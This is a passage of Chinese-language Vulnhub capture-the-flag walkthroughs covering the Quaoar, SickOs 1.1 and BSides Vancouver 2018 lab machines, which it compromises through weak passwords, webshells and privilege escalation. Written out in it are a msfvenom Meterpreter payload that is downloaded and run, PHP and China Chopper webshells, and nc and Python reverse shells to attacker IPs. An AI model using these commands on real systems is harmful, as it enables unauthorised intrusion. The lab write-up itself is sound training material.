'></a>4. 种植Meterpreter shell</h3><p>首先生成一个msf的可执行木马。</p><p><code>msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=4444 -f elf > ~/Desktop/msf.elf</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307919687573.jpg' alt='' referrerPolicy='no-referrer' /></p><p>之后使用Python搭建一个简单的Web Server:<code>python -m SimpleHTTPServer 80</code></p><p>之后利用前面获得的一句话,执行命令,下载生成的木马,并且运行。</p><p>下载木马:<code>x=system('wget http://192.168.1.4:9999/msf.elf');</code></p><p>之后<code>x=system('ls');</code> 发现并没有保存,推测是因为权限问题。那么,直接下载到<code>/tmp</code>目录</p><p><code>x=system('wget http://192.168.1.4:9999/msf.elf -O /tmp/msf.elf');</code></p><p>查看一下:
<img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307925456818.jpg' alt='' referrerPolicy='no-referrer' /></p><p>之后添加执行权限并且运行。</p><pre class="md-fences md-end-block" lang=""> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation"><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">x=system('chmod +x /tmp/msf.elf');</span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">x=system('/tmp/msf.elf');</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 54px;"></div><div class="CodeMirror-gutters" style="display: none; height: 84px;"></div></div></div></pre><p>结果如下:
<img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307926464521.jpg' alt='' referrerPolicy='no-referrer' /></p><p> </p><p> </p><h2><a name='header-n9401' class='md-header-anchor '></a>提升权限</h2><p>Linux提权的基本思路:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15277596742208/15277780553156.jpg' alt='' referrerPolicy='no-referrer' /></p><p> </p><h3><a name='header-n9408' class='md-header-anchor '></a>1. 使用msf提权</h3><p><code>use post/multi/recon/local_exploit_suggester</code></p><p>没有发现可以利用的提权漏洞。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307944129988.jpg' alt='' referrerPolicy='no-referrer' /></p><p> </p><h3><a name='header-n9417' class='md-header-anchor '></a>2. 溢出提权</h3><p>现在拿到了目标靶机的Meterpreter shell,简单的看下信息。
<img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307926898597.jpg' alt='' referrerPolicy='no-referrer' /></p><p>发现系统为<code>Ubuntu 12.04 (Linux 3.2.0-23-generic)</code>。到<code>www.exploit-db.com</code>搜索对应的exp。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307928156767.jpg' alt='' referrerPolicy='no-referrer' /></p><p>这里使用第二个EXP。地址为:<code>https://www.exploit-db.com/exploits/33589/</code></p><p>使用方法:
<img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307928690163.jpg' alt='' referrerPolicy='no-referrer' /></p><p>首先使用Meterpreter的shell把C代码写入:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307929385748.jpg' alt='' referrerPolicy='no-referrer' /></p><p>进入shell,使用Python spawn一个shell。
<code>python -c 'import pty;pty.spawn("/bin/bash")'</code>。</p><p>之后编译执行exp。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307931869735.jpg' alt='' referrerPolicy='no-referrer' /></p><p> </p><h2><a name='header-n9443' class='md-header-anchor '></a>获取flag</h2><p>在root的家目录发现了<code>flag.txt</code>文件:
<img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307931748150.jpg' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n9447' class='md-header-anchor '></a>靶场思路回顾</h2><p>至此,已经完成最终目标,回头分析一下之前几个失败的点。</p><h3><a name='header-n9450' class='md-header-anchor '></a>1. 使用phpliteadmin写马失败原因</h3><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307932678504.jpg' alt='' referrerPolicy='no-referrer' /></p><p>发现网站的根目录为<code>/var/www</code>而不是<code>/var/www/html</code>,其次<code>www</code>目录的权限问题,不能直接写shell。</p><p>但是<code>/var/www/</code>下的其他目录,权限设置的非常大,可以直接写shell。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307933864994.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n9459' class='md-header-anchor '></a>2.再次利用phpliteadmin写马尝试getshell</h3><p>在以上基础上,我们知道了网站的绝对路径,且网站目录的其他文件夹权限设置有问题。</p><p>尝试写shell:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307936953989.jpg' alt='' referrerPolicy='no-referrer' /></p><p>成功写入:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307937353945.jpg' alt='' referrerPolicy='no-referrer' /></p><p> </p><h2><a name='header-n9472' class='md-header-anchor '></a>思路总结</h2><p>突破点总结:</p><ol start='' ><li>phpliteadmin登陆弱口令</li><li>通过phpliteadmin向数据库文件写入一句话木马</li><li>利用LFI和数据库文件getshell</li><li>MSF生成木马,利用一句话寻找可写目录植入、运行</li><li>利用系统漏洞提权为root</li></ol><p>在完成这次靶场的过程中,可以有很多发散的思路,比如:</p><ol start='' ><li>文件包含漏洞,可以使用字典Fuzz一下各种配置文件和日志文件。比如通过包含SSH日志的方式getshell。</li><li>Fuzz一下网站的绝对路径,利用phpliteadmin写shell。</li></ol><p> </p><p>总体来说,此靶场很有意思。既考察了Web基本的漏洞、phpliteadmin的组合利用,也考察了目录权限设置的知识点。可以有多种方式完成,可玩性高。</p><p> </p><h1><a name='header-n9507' class='md-header-anchor '></a>第十节 Quaoar</h1><h2><a name='header-n9508' class='md-header-anchor '></a>靶机信息</h2><h3><a name='header-n9509' class='md-header-anchor '></a>下载链接</h3><p><a href='https://download.vulnhub.com/hackfest2016/Quaoar.ova' target='_blank' class='url'>https://download.vulnhub.com/hackfest2016/Quaoar.ova</a></p><h3><a name='header-n9512' class='md-header-anchor '></a>运行环境</h3><ul><li>​本靶机提供了OVA格式的镜像,官方推荐使用virtualbox,从Vulnhub下载之后,导入到viirtualbox即可运行。</li><li>靶机:修改靶机的网络配置为桥接模式。</li><li>攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机。</li></ul><h3><a name='header-n9523' class='md-header-anchor '></a>靶机说明</h3><p>本靶机的难度为初学者。</p><p>本靶机的渗透目标为渗透进靶机,找到flag,并拿到root权限。</p><p>作者推荐工具<code>nmap dirb / dirbuster / BurpSmartBuster nikto wpscan hydra</code></p><h2><a name='header-n9530' class='md-header-anchor '></a>信息收集</h2><ul><li><p>ip发现</p><p>首先看一下Kali的网络配置。
  <img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/12/_image/1.JPG' alt='' referrerPolicy='no-referrer' /></p><p>靶机IP机器直接说明</p></li></ul><p>   <img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/12/_image/2.JPG' alt='' referrerPolicy='no-referrer' /></p><ul><li><p>端口扫描与服务识别</p><p>确定目标IP之后,使用Nmap对目标进行更加详细的探测:
<code>nmap -A -v 192.168.1.3 -oN nmap.txt</code></p><p>解释一下相关参数:</p><ul><li><code>-A</code> 详细扫描目标IP,加载所有脚本,尽可能全面的探测信息;</li><li><code>-v</code> 显示详细的扫描过程;</li><li><code>-oN</code> 将扫描结果以普通文本的格式输出到<code>nmap.txt</code>。
结果如下:
<img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/12/_image/3.JPG' alt='' referrerPolicy='no-referrer' /></li></ul></li></ul><ul><li><p>威胁建模</p><p>分析nmap的扫描结果,发现靶机开放了<code>22</code>和<code>80</code>端口,系统为<code>Linux</code>。<code>22</code>端口为<code>SSH</code>服务,<code>80</code>端口为<code>http</code>服务,Web容器为<code>Apache/2.2.22</code>。</p><p>通常Web会存在各种各样的问题,经过初步分析,以Web作为初步的渗透入口。</p></li></ul><h2><a name='header-n9573' class='md-header-anchor '></a>Web漏洞挖掘</h2><h3><a name='header-n9575' class='md-header-anchor '></a>1. 使用dirb扫描网站目录</h3><p><code>dirb http://172.19.0.182</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/12/_image/4.JPG' alt='' referrerPolicy='no-referrer' /></p><p>发现robots.txt,upload目录,wordpress目录。</p><p>查看robots.txt,指向的也是wordpress目录</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/12/_image/5.JPG' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n9586' class='md-header-anchor '></a>2. 弱口令</h3><p>利用wpscan进行扫描</p><pre class="md-fences md-end-block" lang="" style="break-inside: unset;"> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation" style=""><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">wpscan -u http://172.19.0.182/wordpress --wp-content-dir wp-content --enumerate u</span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] Enumerating usernames ...</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] Identified the following 2 user/s:</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">    +----+--------+--------+</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">    | Id | Login  | Name   |</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">    +----+--------+--------+</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">    | 1  | admin  | admin  |</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">    | 2  | wpuser | wpuser |</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">    +----+--------+--------+</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[!] Default first WordPress username 'admin' is still used</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] Finished: Fri Jul  6 22:13:24 2018</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] Requests Done: 62</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] Memory used: 63.867 MB</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] Elapsed time: 00:00:05</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 399px;"></div><div class="CodeMirror-gutters" style="display: none; height: 429px;"></div></div></div></pre><p> </p><p>尝试弱口令<code>admin   admin</code>即可进入。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/12/_image/6.JPG' alt='' referrerPolicy='no-referrer' /></p><p> </p><h2><a name='header-n9599' class='md-header-anchor '></a>获取Webshell</h2><h3><a name='header-n9600' class='md-header-anchor '></a>1. 尝试通过修添加获得shell</h3><p><code>cp /usr/share/webshells/php/php-reverse-shell.php shelly.php</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/12/_image/7.JPG' alt='' referrerPolicy='no-referrer' /></p><p>对shell进行修改,然后本地开NC进行监听,访问一个不存在的页面,得到shell</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/12/_image/8.JPG' alt='' referrerPolicy='no-referrer' /></p><p>利用python获得一个新shell</p><p><code>`python -c 'import pty; pty.spawn("/bin/bash")'</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/12/_image/9.JPG' alt='' referrerPolicy='no-referrer' /></p><p>在该权限下,获取第一个shell</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/12/_image/10.JPG' alt='' referrerPolicy='no-referrer' /></p><p> </p><h2><a name='header-n9622' class='md-header-anchor '></a>提升权限</h2><h3><a name='header-n9623' class='md-header-anchor '></a>1. 查看应用密码尝试弱口令</h3><p>查看wordpress的配置文件</p><p>发现root的账号密码</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/12/_image/11.JPG' alt='' referrerPolicy='no-referrer' /></p><p> </p><p>得到root权限</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/12/_image/12.JPG' alt='' referrerPolicy='no-referrer' /></p><p>拿到另一个flag</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/12/_image/13.JPG' alt='' referrerPolicy='no-referrer' /></p><p> </p><h1><a name='header-n9642' class='md-header-anchor '></a>第十一节 SickOs 1.1</h1><h2><a name='header-n9643' class='md-header-anchor '></a>靶机信息</h2><h3><a name='header-n9644' class='md-header-anchor '></a>下载链接</h3><p><a href='https://download.vulnhub.com/sickos/sick0s1.1.7z' target='_blank' class='url'>https://download.vulnhub.com/sickos/sick0s1.1.7z</a></p><h3><a name='header-n9647' class='md-header-anchor '></a>运行环境</h3><ul><li>​本靶机提供了OVF格式的镜像,官方推荐使用VMware Workstation,从Vulnhub下载之后,导入到VMware Workstation即可运行。</li><li>靶机:NAT自动获取IP。</li><li>攻击机:NAT自动获取IP:192.168.202.128。</li></ul><h3><a name='header-n9658' class='md-header-anchor '></a>靶机说明</h3><p>本靶机目的是拿到root权限,读取/root/a0216ea4d51874464078c618298b1367.txt文件。</p><h2><a name='header-n9661' class='md-header-anchor '></a>信息收集</h2><ul><li>ip发现</li></ul><p>靶机所处网段是192.168.202.1/24,使用nmap扫描获取靶机IP:192.168.202.133。
<img src='https://i.imgur.com/Sa8He6D.png' alt='' referrerPolicy='no-referrer' /></p><ul><li>端口扫描与服务识别
对该IP全端口扫描如下:</li></ul><p><img src='https://i.imgur.com/J4QyA5e.png' alt='' referrerPolicy='no-referrer' /></p><p>发现使用squid代理。尝试设置浏览器代理,访问<a href='http://192.168.202.133/' target='_blank' class='url'>http://192.168.202.133/</a>:
<img src='https://i.imgur.com/TgWO3gi.png' alt='' referrerPolicy='no-referrer' />
初步得到结果是通过挂代理对靶机IP进行漏洞挖掘。</p><h2><a name='header-n9680' class='md-header-anchor '></a>Web漏洞挖掘</h2><p>设置代理进行目录爆破:
<img src='https://i.imgur.com/ECYErtb.png' alt='' referrerPolicy='no-referrer' /></p><p>访问robots.txt:
<img src='https://i.imgur.com/540LyET.png' alt='' referrerPolicy='no-referrer' /></p><p>发现是wolfcms,前台都是一些静态页面,无可利用点。
<img src='https://i.imgur.com/8SFGttD.png' alt='' referrerPolicy='no-referrer' /></p><p>默认地址<a href='http://192.168.202.133/wolfcms/?/admin/' target='_blank' class='url'>http://192.168.202.133/wolfcms/?/admin/</a>进入管理后台:
<img src='https://i.imgur.com/qcutT1t.png' alt='' referrerPolicy='no-referrer' /></p><p>尝试使用admin/admin弱口令进入后台,从提示信息可以看出cms版本<0.8.3.1,可能存在文件上传漏洞:
<img src='https://i.imgur.com/9E9RE38.png' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n9696' class='md-header-anchor '></a>获取webshell</h2><h3><a name='header-n9697' class='md-header-anchor '></a>思路一</h3><p>后台可以上传任意后缀文件,上大马,获取webshell:
<img src='https://i.imgur.com/jfLyKEn.png' alt='' referrerPolicy='no-referrer' /></p><p>直接读取文件发现权限不够,没有回显:
<img src='https://i.imgur.com/QfC7XrW.png' alt='' referrerPolicy='no-referrer' /></p><p>查看开放的端口,发现3306开启,但是发现mysql版本大于5.1,无法udf提权:
<img src='https://i.imgur.com/YIMuln3.png' alt='' referrerPolicy='no-referrer' /></p><p>利用大马功能反弹shell:
<img src='https://i.imgur.com/fJFfkXY.png' alt='' referrerPolicy='no-referrer' />
<img src='https://i.imgur.com/YRV0vtL.png' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n9711' class='md-header-anchor '></a>思路二</h3><p>扫描目录时还发现了cgi-bin目录,通过百度发现可能存在bash漏洞可以直接getshell。利用nc反弹shell。
<img src='https://i.imgur.com/ySdDGRs.png' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n9715' class='md-header-anchor '></a>提升权限</h2><p>尝试使用su切换用户或者sudo直接查看文件,发现没权限:
<img src='https://i.imgur.com/Pr3iY30.png' alt='' referrerPolicy='no-referrer' /></p><p>进入网站部署的目录:
<img src='https://i.imgur.com/8nWd3GZ.png' alt='' referrerPolicy='no-referrer' /></p><p>发现有配置文件,运气好可能有存储明文用户密码:
<img src='https://i.imgur.com/Q24NuxO.png' alt='' referrerPolicy='no-referrer' /></p><p>使用获取的用户密码连接数据库失败,尝试用对应密码进行root登录失败。
<img src='https://i.imgur.com/qnjk8X0.png' alt='' referrerPolicy='no-referrer' /></p><p>查看系统的其他用户,发现sickos账户很特别:
<img src='https://i.imgur.com/s3vVfpI.png' alt='' referrerPolicy='no-referrer' /></p><p>用户名:sickos,密码:john@123登录成功。
<img src='https://i.imgur.com/RDHnQfj.png' alt='' referrerPolicy='no-referrer' /></p><p>sudo命令查看文件:
<img src='https://i.imgur.com/remDsux.png' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n9737' class='md-header-anchor '></a>思路总结</h2><p>1.利用文件上传漏洞或者bash漏洞获取系统shell。</p><p>2.部署的网站可能会存储数据库等明文用户密码,可以加以利用。</p><h1><a name='header-n9742' class='md-header-anchor '></a>第十二节 BSides-Vancouver-2018-Workshop</h1><h2><a name='header-n9743' class='md-header-anchor '></a>靶机信息</h2><h3><a name='header-n9745' class='md-header-anchor '></a>下载链接</h3><p><a href='https://download.vulnhub.com/bsidesvancouver2018/BSides-Vancouver-2018-Workshop.ova' target='_blank' class='url'>https://download.vulnhub.com/bsidesvancouver2018/BSides-Vancouver-2018-Workshop.ova</a></p><h3><a name='header-n9748' class='md-header-anchor '></a>靶机说明</h3><p>靶机用ValualBox创建,目标是在其上获得root级访问。</p><h3><a name='header-n9751' class='md-header-anchor '></a>目标</h3><p>Boot to root:获得root权限和Flag。</p><h3><a name='header-n9754' class='md-header-anchor '></a>运行环境</h3><ul><li>靶机:通过ValualBox打开虚拟机,网络连接方式设置为主机模式(host-only),或者将虚拟机、Kali机都桥接到物理机的无线网卡。测试中使用VMWare导入虚机会无法获得IP,使用ValualBox可正常获得IP。</li><li>攻击机:同网段下有Windows攻击机(物理机),安装有Nmap、Burpsuit、Wireshark、Sqlmap、nc、Hydra、Python2.7、DirBuster、AWVS、Nessus等渗透工具。同样可使用Kali Linux作为攻击机,预装了全面的渗透工具。</li></ul><h2><a name='header-n9762' class='md-header-anchor '></a>信息收集</h2><ul><li>IP识别</li></ul><p>启动虚拟机,使用nmap扫描C段IP <code>nmap -sP 192.168.56.0/24</code> 获得虚机IP 192.168.56.101</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/1.jpg' alt='' referrerPolicy='no-referrer' /></p><ul><li>端口和服务识别</li></ul><p>Nmap命令:<code>nmap -p1-65535 -open -A 192.168.56.101 -oN BSides.txt</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/2.jpg' alt='' referrerPolicy='no-referrer' /></p><p>汇总开放的端口和服务:</p><p>端口          服务       提示信息</p><p>21           FTP        vsftpd2.3.5 允许匿名登录</p><p>22           ssh        OpenSSH 5.9p1</p><p>80           http       Apache httpd 2.2.22 (Ubuntu)</p><h2><a name='header-n9790' class='md-header-anchor '></a>漏洞挖掘</h2><ul><li>渗透方法一:</li><li>0x01 匿名登录FTP获得用户</li></ul><p>Windows下使用XFTP匿名登录FTP:在public目录下,找到users.txt.bk文件,用记事本打开:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/3.jpg' alt='' referrerPolicy='no-referrer' /></p><p>获得5个用户名:abatchy,john,mai,anne,doomguy</p><ul><li>0x02 用5个用户名加弱口令字典进行ssh暴破</li></ul><p>Windows下可使用九头蛇Hydra Windows版本或其他工具暴破,这里采用“超级弱口令检查工具V1.0”进行暴破,线程不能开太高,否则虚机会挂,4线程。</p><p>字典的选择,选用字典:darkweb2017-top10000.txt。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/4.jpg' alt='' referrerPolicy='no-referrer' /></p><p>暴破得到用户名:anne   密码:princess</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/5.jpg' alt='' referrerPolicy='no-referrer' /></p><ul><li>0x03 登录ssh,具有sudo权限,获得flag </li></ul><p>使用Xshell工具ssh登录账号:anne 密码:princess</p><p>执行id命令和sudo -l命令,发现anne具有sudo权限:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/6.jpg' alt='' referrerPolicy='no-referrer' /></p><p>执行sudo -l /root命令,sudo cat /root/flag.txt命令,获得flag:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/7.jpg' alt='' referrerPolicy='no-referrer' /></p><ul><li>渗透方法二:</li><li>0x01 环境设置</li></ul><p>因需要用到Kali虚机, 需要调整将bsides虚拟机、Kali攻击机都桥接到笔记本电脑的无线网卡,bsides虚拟机会重新获得新IP。使用Namp扫描无线网卡C段可获得bsides虚机的新IP为:172.20.10.8,Kali虚机的IP是:172.20.10.9。</p><p>Nmap命令:<code>nmap -sP 192.168.56.0/24</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/8.jpg' alt='' referrerPolicy='no-referrer' /></p><p>同样匿名登录FTP,获得5个用户名:abatchy,john,mai,anne,doomguy</p><ul><li>0x02 访问80端口http服务</li></ul><p>访问 <code>http://172.20.10.8/</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/9.jpg' alt='' referrerPolicy='no-referrer' /></p><p>访问 <code>http://172.20.10.8/robots.txt</code> 发现/backup_wordpress目录:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/10.jpg' alt='' referrerPolicy='no-referrer' /></p><p>访问 <code>http://172.20.10.8/backup_wordpress/</code>进入WordPress页面:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/11.jpg' alt='' referrerPolicy='no-referrer' /></p><ul><li>0x03 使用wpscan扫描WordPress,暴破后台用户名和密码:</li></ul><p>(1)暴破用户名,命令<code>wpscan -u http://172.20.10.8/backup_wordpress --enumerate u</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/12.jpg' alt='' referrerPolicy='no-referrer' /></p><p>获得用户名:admin   john</p><p>(2)使用wpscan默认字典,暴破密码:</p><p><code>wpscan --url wpscan -u http://172.20.10.8/backup_wordpress --wordlist /root/share/darkweb2017-top10000.txt --username john</code></p><p>暴破字典依然使用darkweb2017-top10000.txt弱口令字典:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/13.jpg' alt='' referrerPolicy='no-referrer' /></p><p>暴破成功,获得用户名john 密码enigma</p><h2><a name='header-n9883' class='md-header-anchor '></a>获取shell</h2><ul><li>0x04 登录并反弹shell</li></ul><p>(1)使用用户名 john  密码enigma登录WordPress,登录地址 <code>http://172.20.10.8/backup_wordpress/wp-login.php</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/14.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(2)WordPress获取shell的方法有多种,进入<code>Appearance  -> Editor</code>,点击右边的<code>Theme Header</code>,在编辑器里面插入一句话命令执行小马<code><?php system($_GET['cmd']); ?></code>保存。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/15.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(3)在Burpsuit中通过cmd参数执行命令,访问<code>172.20.10.8/backup_wordpress/?cmd=id;ls</code> 成功执行id和ls命令:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/16.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(4)通过nc反弹shell 执行命令<code>rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 172.20.10.5 4444 >/tmp/f</code>,需将命令进行url编码,然后在Burpsuit中发送:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/17.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(5)Windows攻击机开启nc接收反弹shell成功:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/18.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(6)为查找和传送文件方便,写入菜刀马<code>echo '<?php eval($_POST['123456']);?>' >> caidao.php</code> </p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/19.jpg' alt='' referrerPolicy='no-referrer' /></p><p>菜刀连接成功:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/20.jpg' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n9917' class='md-header-anchor '></a>提升权限</h2><ul><li>0x5 查找用户文件</li></ul><p>(1)查找每个用户文件,和浏览各目录文件,发现位于<code>/usr/local/bin/cleanup</code>文件,其权限是777,查看内容为:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/21.jpg' alt='' referrerPolicy='no-referrer' /></p><p><code>#!/bin/sh</code></p><p><code>rm -rf /var/log/apache2/*    # Clean those damn logs!!</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/22.jpg' alt='' referrerPolicy='no-referrer' /></p><p>这是一段清理Apache日志的脚本,需要root权限运行。</p><p>查看cleanup文件的权限为777,可以随意修改和执行,可以将文件内容改成一个反弹shell。</p><p>(2)在菜刀中直接修改cleanup文件为反弹shell命令:因在<code>/usr/local/lib/python2.7/</code>目录下安装有Python2.7,所以可以使用Python反弹shell</p><p><code>python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.20.10.5",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/23.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(3)Windows开启NC,等待接收反弹shell,root权限:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/24.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(4)查看flag:</p><p><img 